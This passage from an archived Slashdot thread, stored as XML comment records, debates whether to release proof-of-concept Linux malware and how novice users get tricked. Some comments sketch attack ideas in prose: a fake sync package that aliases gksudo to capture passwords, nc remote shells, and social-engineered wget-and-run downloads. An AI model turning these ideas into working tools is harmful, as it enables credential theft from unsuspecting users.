	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279680</id>
	<title>Re:I think you've already decided...</title>
	<author>Anonymous</author>
	<datestamp>1259605740000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>4</modscore>
	<htmltext><blockquote><div><p>You can get victimized by something that you HAVE TO CHOOSE TO RUN MANUALLY!</p></div></blockquote><p>It's not that simple. A lot of ill informed users do little things to get stuff working in Ubuntu based on reading it somewhere on a blog or a forum. I've seen suggestions for network configs that leave a lot to be desired - basically creating anonymous login ftp to the users home directory with write access. And these things are tempting if you want, for example, your phone to connect to your PC over wifi and you don't generally consider security.</p><p>A little script or carefully constructed script or package that calls gksudo to get permission to hide the real gksudo behind an alias and captures the password could be attractive if it provides a "simple way to sync your smart phone with the ubuntu desktop - even supporting the iphone". We haven't seen one in the wild yet, AFAIK, but that would be pretty successful. I even think that the model for distributing the iPhone thing that went around would work pretty well given some of the advice out there especially if you read the "fix" and don't read the comment buried halfway down the page with a warning in it.</p><p>That's the trouble with the Linux ostrich based security model. It's just like the Windows security model. It relies completely on users having the understanding to set their systems up and maintain them securely and unfortunately the temptation to do quick and dirty tricks is very high in the desktop linux world.</p><p>In fairness, a default install of Ubuntu is more secure than Windows XP and Vista (not sure about win7) but the volume of quick and dirty fixes and the signal to noise on Ubuntu is such that they are really about even. As always, a classic PEBCAK.</p></div>
	</htmltext>
<tokenext>You can get victimized by something that you HAVE TO CHOOSE TO RUN MANUALLY ! It 's not that simple .
A lot of ill informed users do little things to get stuff working in Ubuntu based on reading it somewhere on a blog or a forum .
I 've seen suggestions for network configs that leave a lot to be desired - basically creating anonymous login ftp to the users home directory with write access .
And these things are tempting if you want , for example , your phone to connect to your PC over wifi and you do n't generally consider security.A little script or carefully constructed script or package that calls gksudo to get permission to hide the real gksudo behind an alias and captures the password could be attractive if it provides a " simple way to sync your smart phone with the ubuntu desktop - even supporting the iphone " .
We have n't seen one in the wild yet , AFAIK , but that would be pretty successful .
I even think that the model for distributing the iPhone thing that went around would work pretty well given some of the advice out there especially if you read the " fix " and do n't read the comment buried halfway down the page with a warning in it.That 's the trouble with the Linux ostrich based security model .
It 's just like the Windows security model .
It relies completely on users having the understanding to set their systems up and maintain them securely and unfortunately the temptation to do quick and dirty tricks is very high in the desktop linux world.In fairness , a default install of Ubuntu is more secure than Windows XP and Vista ( not sure about win7 ) but the volume of quick and dirty fixes and the signal to noise on Ubuntu is such that they are really about even .
As always , a classic PEBCAK .</tokentext>
<sentencetext>You can get victimized by something that you HAVE TO CHOOSE TO RUN MANUALLY!It's not that simple.
A lot of ill informed users do little things to get stuff working in Ubuntu based on reading it somewhere on a blog or a forum.
I've seen suggestions for network configs that leave a lot to be desired - basically creating anonymous login ftp to the users home directory with write access.
And these things are tempting if you want, for example, your phone to connect to your PC over wifi and you don't generally consider security.A little script or carefully constructed script or package that calls gksudo to get permission to hide the real gksudo behind an alias and captures the password could be attractive if it provides a "simple way to sync your smart phone with the ubuntu desktop - even supporting the iphone".
We haven't seen one in the wild yet, AFAIK, but that would be pretty successful.
I even think that the model for distributing the iPhone thing that went around would work pretty well given some of the advice out there especially if you read the "fix" and don't read the comment buried halfway down the page with a warning in it.That's the trouble with the Linux ostrich based security model.
It's just like the Windows security model.
It relies completely on users having the understanding to set their systems up and maintain them securely and unfortunately the temptation to do quick and dirty tricks is very high in the desktop linux world.In fairness, a default install of Ubuntu is more secure than Windows XP and Vista (not sure about win7) but the volume of quick and dirty fixes and the signal to noise on Ubuntu is such that they are really about even.
As always, a classic PEBCAK.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281568</id>
	<title>Non-Malicious Malware</title>
	<author>davidshewitt</author>
	<datestamp>1259670960000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>That seems like an oxymoron to me.</htmltext>
<tokenext>That seems like an oxymoron to me .</tokentext>
<sentencetext>That seems like an oxymoron to me.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30284528</id>
	<title>Re:Ethics</title>
	<author>NotBornYesterday</author>
	<datestamp>1259688720000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>It's a poor carpenter who blames his tools.<nobr> <wbr></nobr>;)</htmltext>
<tokenext>It 's a poor carpenter who blames his tools .
; )</tokentext>
<sentencetext>It's a poor carpenter who blames his tools.
;)</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278582</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30282688</id>
	<title>Non-Malicious Malware?</title>
	<author>Anonymous</author>
	<datestamp>1259680380000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext>Isn't the word "malware" formed from the words "malicious" and "software"?</htmltext>
<tokenext>Is n't the word " malware " formed from the words " malicious " and " software " ?</tokentext>
<sentencetext>Isn't the word "malware" formed from the words "malicious" and "software"?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281542</id>
	<title>Release it to trusted parties with kernel trees</title>
	<author>Bozovision</author>
	<datestamp>1259670720000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>2</modscore>
	<htmltext><p>Mail it to Linus, Alan Cox and the maintainers of subsystems which it abuses. Include clear notes of how it works, and what can be done to protect the systems. If you can't trust these people with it, then you should not trust Linux with your data at all. Even better, since you understand the tricks it uses, if you can write some patches, and submit them, together with your proof of exploit.</p><p>On a personal note - I also want to say thank you for doing this work. I use Linux both on servers, and as my normal desktop, and I'm immensely pleased that people are looking at making it safer: thank you.</p></htmltext>
<tokenext>Mail it to Linus , Alan Cox and the maintainers of subsystems which it abuses .
Include clear notes of how it works , and what can be done to protect the systems .
If you ca n't trust these people with it , then you should not trust Linux with your data at all .
Even better , since you understand the tricks it uses , if you can write some patches , and submit them , together with your proof of exploit.On a personal note - I also want to say thank you for doing this work .
I use Linux both on servers , and as my normal desktop , and I 'm immensely pleased that people are looking at making it safer : thank you .</tokentext>
<sentencetext>Mail it to Linus, Alan Cox and the maintainers of subsystems which it abuses.
Include clear notes of how it works, and what can be done to protect the systems.
If you can't trust these people with it, then you should not trust Linux with your data at all.
Even better, since you understand the tricks it uses, if you can write some patches, and submit them, together with your proof of exploit.On a personal note - I also want to say thank you for doing this work.
I use Linux both on servers, and as my normal desktop, and I'm immensely pleased that people are looking at making it safer: thank you.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30285900</id>
	<title>Don't involve BOINC, please</title>
	<author>Wormholio</author>
	<datestamp>1259694360000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Please don't associate BOINC with you little project.   It will confuse the casual reader into thinking it is something bad rather than something good.</p></htmltext>
<tokenext>Please do n't associate BOINC with you little project .
It will confuse the casual reader into thinking it is something bad rather than something good .</tokentext>
<sentencetext>Please don't associate BOINC with you little project.
It will confuse the casual reader into thinking it is something bad rather than something good.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30286462</id>
	<title>Re:Insecurity through stupidity</title>
	<author>BJ\_Covert\_Action</author>
	<datestamp>1259696340000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>You know, I made the switch to Ubuntu about a year ago. I bought a 'Linux Starter Kit' magazine with an 8.04 install CD in it. The magazine is about 100 pages long I think. In the first section, regarding installing Ubuntu, the importance of complex passwords is stressed. The author also discusses a few simple methods for developing easy-to-remember complex passwords. I took that advice very seriously and have been telling all my friends about the need for using special characters and what not. I think, little by little, it's paying off and folk I know are starting to come around. So, while the Ubuntu developers may have screwed up with regards to passwords, there is certainly a portion of the community that takes an active role in propagating security advice.<nobr> <wbr></nobr>... Also of note, every time I post to the Ubuntu forums, one or more responses to my questions include caveats, warnings, or just general security wisdom....It seems like it would be hard to be an Ubuntu newbie and not read about potential security issues.
<br> <br>
Just my two cents. Cheers.</htmltext>
<tokenext>You know , I made the switch to Ubuntu about a year ago .
I bought a 'Linux Starter Kit ' magazine with an 8.04 install CD in it .
The magazine is about 100 pages long I think .
In the first section , regarding installing Ubuntu , the importance of complex passwords is stressed .
The author also discusses a few simple methods for developing easy-to-remember complex passwords .
I took that advice very seriously and have been telling all my friends about the need for using special characters and what not .
I think , little by little , it 's paying off and folk I know are starting to come around .
So , while the Ubuntu developers may have screwed up with regards to passwords , there is certainly a portion of the community that takes an active role in propagating security advice .
... Also of note , every time I post to the Ubuntu forums , one or more responses to my questions include caveats , warnings , or just general security wisdom....It seems like it would be hard to be an Ubuntu newbie and not read about potential security issues .
Just my two cents .
Cheers .</tokentext>
<sentencetext>You know, I made the switch to Ubuntu about a year ago.
I bought a 'Linux Starter Kit' magazine with an 8.04 install CD in it.
The magazine is about 100 pages long I think.
In the first section, regarding installing Ubuntu, the importance of complex passwords is stressed.
The author also discusses a few simple methods for developing easy-to-remember complex passwords.
I took that advice very seriously and have been telling all my friends about the need for using special characters and what not.
I think, little by little, it's paying off and folk I know are starting to come around.
So, while the Ubuntu developers may have screwed up with regards to passwords, there is certainly a portion of the community that takes an active role in propagating security advice.
... Also of note, every time I post to the Ubuntu forums, one or more responses to my questions include caveats, warnings, or just general security wisdom....It seems like it would be hard to be an Ubuntu newbie and not read about potential security issues.
Just my two cents.
Cheers.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278974</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281112</id>
	<title>Re:Linux Malware</title>
	<author>Anonymous</author>
	<datestamp>1259665560000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>You evil bastard! your script is doing something to my hard-dis</p></htmltext>
<tokenext>You evil bastard !
your script is doing something to my hard-dis</tokentext>
<sentencetext>You evil bastard!
your script is doing something to my hard-dis</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279508</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279060</id>
	<title>Re:You've failed to understand the real world</title>
	<author>Rufty</author>
	<datestamp>1259599680000</datestamp>
	<modclass>Funny</modclass>
	<modscore>1</modscore>
	<htmltext><em>Malware can exist for any platform.</em> <p>Damit! I knew there was a reason it took so long to get to the login screen on my sliderule!</p></htmltext>
<tokenext>Malware can exist for any platform .
Damit ! I knew there was a reason it took so long to get to the login screen on my sliderule !</tokentext>
<sentencetext>Malware can exist for any platform.
Damit! I knew there was a reason it took so long to get to the login screen on my sliderule!</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278624</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278620</id>
	<title>Commendable</title>
	<author>Anrego</author>
	<datestamp>1259596020000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>5</modscore>
	<htmltext><p>.. but sounds like a lot of work to prove a relatively straight foward point.</p><p>It's actually been my opinion that Linux in the hands of someone who doesn't know how to use it can in some situations be less secure than windows.</p><p>My reasoning for this is that:</p><p>1) Newbie Linux users who are having problems with their systems will rpetty much run anything as any user you tell them to in a desperate hope to get Xorg working again</p><p>2) Linux commands on their own can look very cryptic to the uninitiated.. add into that the scripting abilities of most shells.. and a new Linux user won't be able to differentiate a malicious command from one that will get their nvidia driver working again</p><p>3) The out-of-box remote admin abilities of Linux are excellent.</p><p>4) Standard tools like nc can easily be used to establish out-connecting remote shell sessions</p><p>5) OR you can just get them to wget and execute your favourite piece of malware.</p></htmltext>
<tokenext>.. but sounds like a lot of work to prove a relatively straight foward point.It 's actually been my opinion that Linux in the hands of someone who does n't know how to use it can in some situations be less secure than windows.My reasoning for this is that : 1 ) Newbie Linux users who are having problems with their systems will rpetty much run anything as any user you tell them to in a desperate hope to get Xorg working again2 ) Linux commands on their own can look very cryptic to the uninitiated.. add into that the scripting abilities of most shells.. and a new Linux user wo n't be able to differentiate a malicious command from one that will get their nvidia driver working again3 ) The out-of-box remote admin abilities of Linux are excellent.4 ) Standard tools like nc can easily be used to establish out-connecting remote shell sessions5 ) OR you can just get them to wget and execute your favourite piece of malware .</tokentext>
<sentencetext>.. but sounds like a lot of work to prove a relatively straight foward point.It's actually been my opinion that Linux in the hands of someone who doesn't know how to use it can in some situations be less secure than windows.My reasoning for this is that:1) Newbie Linux users who are having problems with their systems will rpetty much run anything as any user you tell them to in a desperate hope to get Xorg working again2) Linux commands on their own can look very cryptic to the uninitiated.. add into that the scripting abilities of most shells.. and a new Linux user won't be able to differentiate a malicious command from one that will get their nvidia driver working again3) The out-of-box remote admin abilities of Linux are excellent.4) Standard tools like nc can easily be used to establish out-connecting remote shell sessions5) OR you can just get them to wget and execute your favourite piece of malware.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30282618</id>
	<title>Opinion</title>
	<author>Anonymous</author>
	<datestamp>1259679900000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>No<br>Nope<br>Uh-uh<br>Nut<br>Naw<br>Nah<br>No way<br>Na<br>Nese<br>Nein<br>Naaga<br>Bu shi zhe yang<br>Nanga<br>Ndaga'<br>Nei<br>Nyet</p><p>I think you get the idea.</p></htmltext>
<tokenext>NoNopeUh-uhNutNawNahNo wayNaNeseNeinNaagaBu shi zhe yangNangaNdaga'NeiNyetI think you get the idea .</tokentext>
<sentencetext>NoNopeUh-uhNutNawNahNo wayNaNeseNeinNaagaBu shi zhe yangNangaNdaga'NeiNyetI think you get the idea.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280028</id>
	<title>Please Be My Guest</title>
	<author>Anonymous</author>
	<datestamp>1259609880000</datestamp>
	<modclass>Troll</modclass>
	<modscore>-1</modscore>
	<htmltext><p>...And shove it thoroughly, deeply, up your ass where it belongs.</p></htmltext>
<tokenext>...And shove it thoroughly , deeply , up your ass where it belongs .</tokentext>
<sentencetext>...And shove it thoroughly, deeply, up your ass where it belongs.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278822</id>
	<title>What would ... do ? Or time for a reality check.</title>
	<author>stefanlasiewski</author>
	<datestamp>1259597640000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>1</modscore>
	<htmltext><p>I'm sure there are some people in the computer security world who you admire. So ask yourself, what would these people do if they had discovered the exploits? What would <a href="http://www.philzimmermann.com/" title="philzimmermann.com">Phil Zimmermann</a> [philzimmermann.com], or <a href="http://cr.yp.to/" title="cr.yp.to">DJB</a> [cr.yp.to] do? Some of these people were unhappy with the current situation, and took their own road and created some good, secure software.</p><p>Also, maybe your code isn't as good as you claim. Or maybe it mostly uses known exploits. It's time for a reality check. You should try to find some peers, and discuss it with them to determine how dangerous your product really is.</p></htmltext>
<tokenext>I 'm sure there are some people in the computer security world who you admire .
So ask yourself , what would these people do if they had discovered the exploits ?
What would Phil Zimmermann [ philzimmermann.com ] , or DJB [ cr.yp.to ] do ?
Some of these people were unhappy with the current situation , and took their own road and created some good , secure software.Also , maybe your code is n't as good as you claim .
Or maybe it mostly uses known exploits .
It 's time for a reality check .
You should try to find some peers , and discuss it with them to determine how dangerous your product really is .</tokentext>
<sentencetext>I'm sure there are some people in the computer security world who you admire.
So ask yourself, what would these people do if they had discovered the exploits?
What would Phil Zimmermann [philzimmermann.com], or DJB [cr.yp.to] do?
Some of these people were unhappy with the current situation, and took their own road and created some good, secure software.Also, maybe your code isn't as good as you claim.
Or maybe it mostly uses known exploits.
It's time for a reality check.
You should try to find some peers, and discuss it with them to determine how dangerous your product really is.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30289738</id>
	<title>Re:It does harm!!!!</title>
	<author>loutr</author>
	<datestamp>1259665800000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>No news story, as there never even was a trial, and I haven't got the time to find links. I guess you'll have to take my word for it, and since it didn't happened to me directly I can't even guarantee that the story is true, but my mother's friend talked about it at length and seemed really distressed.

</p><p>Ofc we have a notion of private property, but it can be really hard to evict tenants, IIRC the guy had signed up for electricity in his own name, and the bills "proved" that he lived there. We also have protection from vandalism, but when the vandal is a former homeless person who is now in jail for prostitution, you don't expect him to have any money nor insurance...</p></htmltext>
<tokenext>No news story , as there never even was a trial , and I have n't got the time to find links .
I guess you 'll have to take my word for it , and since it did n't happened to me directly I ca n't even guarantee that the story is true , but my mother 's friend talked about it at length and seemed really distressed .
Ofc we have a notion of private property , but it can be really hard to evict tenants , IIRC the guy had signed up for electricity in his own name , and the bills " proved " that he lived there .
We also have protection from vandalism , but when the vandal is a former homeless person who is now in jail for prostitution , you do n't expect him to have any money nor insurance.. .</tokentext>
<sentencetext>No news story, as there never even was a trial, and I haven't got the time to find links.
I guess you'll have to take my word for it, and since it didn't happened to me directly I can't even guarantee that the story is true, but my mother's friend talked about it at length and seemed really distressed.
Ofc we have a notion of private property, but it can be really hard to evict tenants, IIRC the guy had signed up for electricity in his own name, and the bills "proved" that he lived there.
We also have protection from vandalism, but when the vandal is a former homeless person who is now in jail for prostitution, you don't expect him to have any money nor insurance...</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30289190</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278630</id>
	<title>Remember the old t-shirt?</title>
	<author>Anonymous</author>
	<datestamp>1259596140000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext><p>"My other computer is your Linux box"</p><p>Everyone who is paying attention knows there are plenty of hacking tools, bots, worms, and virus-like tools for Linux systems already. The only point to be made would be to the basement-dweller fanboys who are willfully ignorant anyway. So go ahead and release it, but don't expect anyone to applaud you for it.</p></htmltext>
<tokenext>" My other computer is your Linux box " Everyone who is paying attention knows there are plenty of hacking tools , bots , worms , and virus-like tools for Linux systems already .
The only point to be made would be to the basement-dweller fanboys who are willfully ignorant anyway .
So go ahead and release it , but do n't expect anyone to applaud you for it .</tokentext>
<sentencetext>"My other computer is your Linux box"Everyone who is paying attention knows there are plenty of hacking tools, bots, worms, and virus-like tools for Linux systems already.
The only point to be made would be to the basement-dweller fanboys who are willfully ignorant anyway.
So go ahead and release it, but don't expect anyone to applaud you for it.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30291628</id>
	<title>Simply put</title>
	<author>Anonymous</author>
	<datestamp>1259674800000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>If you have to ask the community if it's ethically appropriate for you to release this code probably means that you shouldn't. <br>The fact that you don't know for yourself and you have to ask the community tells me that you probably shouldn't have the skillset you do, for you could potentially use your knowledge for nefarious purposes.</p></htmltext>
<tokenext>If you have to ask the community if it 's ethically appropriate for you to release this code probably means that you should n't .
The fact that you do n't know for yourself and you have to ask the community tells me that you probably should n't have the skillset you do , for you could potentially use your knowledge for nefarious purposes .</tokentext>
<sentencetext>If you have to ask the community if it's ethically appropriate for you to release this code probably means that you shouldn't.
The fact that you don't know for yourself and you have to ask the community tells me that you probably shouldn't have the skillset you do, for you could potentially use your knowledge for nefarious purposes.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281744</id>
	<title>Hurry up..</title>
	<author>Anonymous</author>
	<datestamp>1259672760000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Just release it already.<br>If it actually causes enough trouble to be noticed there'll be a fix for it quick smart, otherwise it won't matter.</p></htmltext>
<tokenext>Just release it already.If it actually causes enough trouble to be noticed there 'll be a fix for it quick smart , otherwise it wo n't matter .</tokentext>
<sentencetext>Just release it already.If it actually causes enough trouble to be noticed there'll be a fix for it quick smart, otherwise it won't matter.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279024</id>
	<title>Release it</title>
	<author>Anonymous</author>
	<datestamp>1259599260000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>How else are we going to accept that which we obstinately refuse to see?<br>-- newall</p></htmltext>
<tokenext>How else are we going to accept that which we obstinately refuse to see ? -- newall</tokentext>
<sentencetext>How else are we going to accept that which we obstinately refuse to see?-- newall</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730</id>
	<title>Dear Slashdot</title>
	<author>Anonymous</author>
	<datestamp>1259597040000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>5</modscore>
	<htmltext><p>I'm fed up with the general consensus that people are able to walk around outside without being punched in the face.  After all, anyone can be punched in the face at any time, so I've been thinking about going up to random people on the street and punching them in the face.  People need to learn to take reasonable steps to protect themselves from being punched in the face, such as wearing full-face motorcycle helmets at all times, and how are they going to learn that if I don't show them?  But now I'm having second thoughts about whether or not it would be ethical to go around randomly punching people in the face.  Does anyone have any advice?</p></htmltext>
<tokenext>I 'm fed up with the general consensus that people are able to walk around outside without being punched in the face .
After all , anyone can be punched in the face at any time , so I 've been thinking about going up to random people on the street and punching them in the face .
People need to learn to take reasonable steps to protect themselves from being punched in the face , such as wearing full-face motorcycle helmets at all times , and how are they going to learn that if I do n't show them ?
But now I 'm having second thoughts about whether or not it would be ethical to go around randomly punching people in the face .
Does anyone have any advice ?</tokentext>
<sentencetext>I'm fed up with the general consensus that people are able to walk around outside without being punched in the face.
After all, anyone can be punched in the face at any time, so I've been thinking about going up to random people on the street and punching them in the face.
People need to learn to take reasonable steps to protect themselves from being punched in the face, such as wearing full-face motorcycle helmets at all times, and how are they going to learn that if I don't show them?
But now I'm having second thoughts about whether or not it would be ethical to go around randomly punching people in the face.
Does anyone have any advice?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278708</id>
	<title>Show it only to while hat hackers</title>
	<author>Logic Worshipper</author>
	<datestamp>1259596680000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>5</modscore>
	<htmltext><p>Show it to distro developers and repository maintainers, people who do security work, etc.  Let them look at it and see if they can defend against it.  Don't release it on unsuspecting users, publish the directions to remove it, and defend against it so no one else can do it either.  Putting malware in the wild is not the way to get white-hats attention, but it is the way to get black hat's attention.  The white hats are usually well behind the black hats with malware that's been released in the wild.  Give this to white hats and not black hats.</p><p>Post it as security bug against all the distros you've confirmed it works against.  That'll attract the attention you want and not the attention you don't.</p></htmltext>
<tokenext>Show it to distro developers and repository maintainers , people who do security work , etc .
Let them look at it and see if they can defend against it .
Do n't release it on unsuspecting users , publish the directions to remove it , and defend against it so no one else can do it either .
Putting malware in the wild is not the way to get white-hats attention , but it is the way to get black hat 's attention .
The white hats are usually well behind the black hats with malware that 's been released in the wild .
Give this to white hats and not black hats.Post it as security bug against all the distros you 've confirmed it works against .
That 'll attract the attention you want and not the attention you do n't .</tokentext>
<sentencetext>Show it to distro developers and repository maintainers, people who do security work, etc.
Let them look at it and see if they can defend against it.
Don't release it on unsuspecting users, publish the directions to remove it, and defend against it so no one else can do it either.
Putting malware in the wild is not the way to get white-hats attention, but it is the way to get black hat's attention.
The white hats are usually well behind the black hats with malware that's been released in the wild.
Give this to white hats and not black hats.Post it as security bug against all the distros you've confirmed it works against.
That'll attract the attention you want and not the attention you don't.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30289996</id>
	<title>Re:It does harm!!!!</title>
	<author>Man Eating Duck</author>
	<datestamp>1259666760000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><blockquote><div><p>I guess you'll have to take my word for it, and since it didn't happened to me directly I can't even guarantee that the story is true, but my mother's friend talked about it at length and seemed really distressed.</p></div></blockquote><p>Frankly I don't believe it, but it's not a big deal<nobr> <wbr></nobr>:) You just got me curious. Thanks for your answer, there's no reason to discuss this further.</p></div>
	</htmltext>
<tokenext>I guess you 'll have to take my word for it , and since it did n't happened to me directly I ca n't even guarantee that the story is true , but my mother 's friend talked about it at length and seemed really distressed.Frankly I do n't believe it , but it 's not a big deal : ) You just got me curious .
Thanks for your answer , there 's no reason to discuss this further .</tokentext>
<sentencetext>I guess you'll have to take my word for it, and since it didn't happened to me directly I can't even guarantee that the story is true, but my mother's friend talked about it at length and seemed really distressed.Frankly I don't believe it, but it's not a big deal :) You just got me curious.
Thanks for your answer, there's no reason to discuss this further.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30289738</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280626</id>
	<title>Doesn't prove anything</title>
	<author>Anonymous</author>
	<datestamp>1259660820000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>This doesn't prove anything. If you download and run untrusted and unverified code you are boned no matter what OS you may be using. This says nothing about the overall security of the OS, but only about the stupidity of the user.</p></htmltext>
<tokenext>This does n't prove anything .
If you download and run untrusted and unverified code you are boned no matter what OS you may be using .
This says nothing about the overall security of the OS , but only about the stupidity of the user .</tokentext>
<sentencetext>This doesn't prove anything.
If you download and run untrusted and unverified code you are boned no matter what OS you may be using.
This says nothing about the overall security of the OS, but only about the stupidity of the user.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596</id>
	<title>Re:I think you've already decided...</title>
	<author>Anonymous</author>
	<datestamp>1259595900000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>5</modscore>
	<htmltext><p>The summary says it doesn't actually do anything malicious and it isn't a worm. There is no legal reason why he couldn't release the code and/or a paper about it.</p><p>The thing is, it's stupid for people to keep thinking their systems are insanely secure. Linux users fall for this all the time, because they've heard so from lots of other Linux users. It's better to show people that it is actually possible, and maybe it leads to better secured systems too.</p></htmltext>
<tokenext>The summary says it does n't actually do anything malicious and it is n't a worm .
There is no legal reason why he could n't release the code and/or a paper about it.The thing is , it 's stupid for people to keep thinking their systems are insanely secure .
Linux users fall for this all the time , because they 've heard so from lots of other Linux users .
It 's better to show people that it is actually possible , and maybe it leads to better secured systems too .</tokentext>
<sentencetext>The summary says it doesn't actually do anything malicious and it isn't a worm.
There is no legal reason why he couldn't release the code and/or a paper about it.The thing is, it's stupid for people to keep thinking their systems are insanely secure.
Linux users fall for this all the time, because they've heard so from lots of other Linux users.
It's better to show people that it is actually possible, and maybe it leads to better secured systems too.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278688</id>
	<title>What is this exactly?</title>
	<author>Novae D'Arx</author>
	<datestamp>1259596500000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Um, reading this, doesn't it require specific software to be installed to be effective?  This does not appear, from what little info is presented, to be a general "hackin' tool" to "pwn newbs".  Or maybe it is.  Let me know when you can actually get into anything with this.

As for releasing it: give it to the devs first.  Let them patch things up.  Then release it after patches are ubiquitous and discuss how clever you are.  Anything else is just plain stupid.</htmltext>
<tokenext>Um , reading this , does n't it require specific software to be installed to be effective ?
This does not appear , from what little info is presented , to be a general " hackin ' tool " to " pwn newbs " .
Or maybe it is .
Let me know when you can actually get into anything with this .
As for releasing it : give it to the devs first .
Let them patch things up .
Then release it after patches are ubiquitous and discuss how clever you are .
Anything else is just plain stupid .</tokentext>
<sentencetext>Um, reading this, doesn't it require specific software to be installed to be effective?
This does not appear, from what little info is presented, to be a general "hackin' tool" to "pwn newbs".
Or maybe it is.
Let me know when you can actually get into anything with this.
As for releasing it: give it to the devs first.
Let them patch things up.
Then release it after patches are ubiquitous and discuss how clever you are.
Anything else is just plain stupid.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280892</id>
	<title>Re:I think you've already decided...</title>
	<author>maggotbrain\_777</author>
	<datestamp>1259663400000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>I don't want schadenfreuede, I just want to read that PowerPoint where my boss told me that we were secure, this year.</htmltext>
<tokenext>I do n't want schadenfreuede , I just want to read that PowerPoint where my boss told me that we were secure , this year .</tokentext>
<sentencetext>I don't want schadenfreuede, I just want to read that PowerPoint where my boss told me that we were secure, this year.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283930</id>
	<title>Just release it already...</title>
